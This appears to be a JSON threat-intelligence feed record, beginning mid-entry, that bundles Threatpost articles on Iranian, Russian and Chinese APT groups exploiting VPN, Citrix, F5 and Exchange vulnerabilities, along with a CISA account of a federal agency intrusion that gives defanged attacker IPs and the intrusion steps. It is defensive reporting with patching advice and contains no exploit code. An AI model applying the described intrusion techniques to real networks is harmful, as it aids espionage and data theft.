"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", 
"title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. 
Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). 
All three exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently.](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>) A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. 
Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n", 
"cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. 
CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. 
The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. 
\u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malware families use hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is perhaps best known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. 
It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. 
\u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. 
The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. 
and allied national-security and government networks, it added.\n\n
The five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. 
\u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortiOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacor Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. An attacker can send a specially crafted URI to trigger the exploit. 
It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who had already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen in September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis is a critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code execution. 
It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **CVE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMware Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. 
State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. 
\u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n", 
"cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. 
CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). 
This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; CISA has also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vectors for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. 
In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:09:34", "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. 
Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. 
First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. 
The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that its intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. 
